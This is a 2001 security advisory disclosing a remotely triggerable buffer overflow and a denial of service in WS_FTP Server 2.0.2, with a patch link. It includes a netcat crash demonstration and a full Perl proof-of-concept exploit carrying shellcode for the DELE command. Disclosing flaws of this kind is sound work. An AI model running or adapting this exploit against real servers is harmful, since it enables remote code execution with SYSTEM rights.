[NT] WS_FTP Server Buffer Overflow and Possible DoS

From: support@securiteam.com
Date: 07/26/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] WS_FTP Server Buffer Overflow and Possible DoS
Message-Id: <20010726193304.C02B8138C4@mail.der-keiler.de>
Date: Thu, 26 Jul 2001 21:33:04 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  WS_FTP Server Buffer Overflow and Possible DoS
------------------------------------------------------------------------

SUMMARY

 <http://www.ipswitch.com/products/WS_FTP-Server/index.html> WS_FTP Server
is a high-powered, easy-to-use FTP (File Transfer Protocol) server for
Windows NT/2000. It allows you to securely share files and folders with
customers, vendors, colleagues, and others over the Internet.
Several security vulnerabilities in the product that allow attackers to
execute arbitrary code on the server using a buffer overflow attack.

DETAILS

Vulnerable systems:
WS_FTP Server version 2.0.2

Immune systems:
WS_FTP Server version 2.0.3

WS_FTP Server contains a buffer overflow that affects the following
commands:
 * DELE
 * MDTM
 * MLST
 * MKD
 * RMD
 * RNFR
 * RNTO
 * SIZE
 * STAT
 * XMKD
 * XRMD

This buffer overflow gives an attacker the ability to run code on the
target with SYSTEM RIGHTS, because the server runs as a service by
default. Note that this is only valid when logged in as an anonymous user,
not an ordinary one.

The server also suffers from an easy-to-trigger Denial of Service
condition.

Command Buffer Overrun
All the above-mentioned commands seem to be using the same parsing code
that suffers from a buffer overflow. By sending a command with an argument
greater than 478 (474 bytes + new return address) bytes, a buffer will
overflow and the EIP will be overwritten. A proof-of-concept exploit is
attached to the advisory, which works against WS_FTP server 2.0.2 running
on WIN2K (Professional and Server, any SP).

  C:\tools\web>nc -nvv 127.0.0.1 21
  (UNKNOWN) [127.0.0.1] 21 (?) open
  220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  220-Tue Jun 19 14:00:21 2001
  220-30 days remaining on evaluation.
  220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  DELE AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA

  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
  edi=77fca3e0
  eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr
  na po nc
  cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
  efl=00010246

Possible DoS
By sending a couple of NULL (0x00) characters, the WS_FTP Server will
spike at 100% CPU.

Workaround:
Download the new version from:
 <http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html>
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html

Exploit:
#!/usr/local/bin/perl
##############################################################
#
# WS_FTP Server 2.0.2 DELE proof-of-concept exploit
# By andreas@defcom.com and janne@defcom.com (C)2001
#
##############################################################
$login="ftp"; #username
$pass="ftp"; #password
##############################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
  print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
  print "It creates a file named defcom.iyd in the c-root\n";
  print "(C)2001 andreas\@defcom.com\n";
     print "Usage: $0 <host>\n";
  print "Example: $0 127.0.0.1\n";
  exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

sleep(1);
$msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit =
"\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
$sploit = $sploit .
"\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
$sploit = $sploit .
"\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
$sploit = $sploit .
"\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";
$msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) .
"\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
$msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 .
"\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
exit;

ADDITIONAL INFORMATION

The information has been provided by <mailto:andreas@defcom.com> Andreas
Junestam and <mailto:janne@defcom.com> Janne Sarendal.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS
    ... def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS ... The server also contains a easy-to-trigger DOS. ... All the above mentioned commands seems to be using the same parsing ...
    (Bugtraq)
  • [NT] Multiple Vulnerabilities in JanaServer
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Windows platform can act as HTTP/FTP/NEWS/SNTP server, ... JanaServer up to 1.46 was freeware, ... HTTP server buffer overflow ...
    (Securiteam)
  • Switch Off Multiple Vulnerabilities
    ... Stack-based Buffer Overflow ... execute arbitrary code on the remote system - possibly with SYSTEM ... cause the server to execute a specially crafted request which will trigger ... vulnerability before such code is made public, ...
    (Bugtraq)
  • [VulnWatch] Switch Off Multiple Vulnerabilities
    ... Stack-based Buffer Overflow ... execute arbitrary code on the remote system - possibly with SYSTEM ... cause the server to execute a specially crafted request which will trigger ... vulnerability before such code is made public, ...
    (VulnWatch)
  • Remote buffer overflow in MailEnable IMAP service [Hat-Squad Advisory]
    ... MailEnable's Mail Server software provides a enterprise messaging platform for Microsoft Windows NT/2000/XP/2003 systems. ... Two vulnerabilities were discovered by Hat-Squad Team in MailEnable's IMAP service including a stack based buffer overflow ... and an object pointer overwrite, both can lead to remote execution of arbitrary code. ... 8198 bytes will cause a stack buffer overflow.This vulnerability can be triggered before any kind of authentification. ...
    (Bugtraq)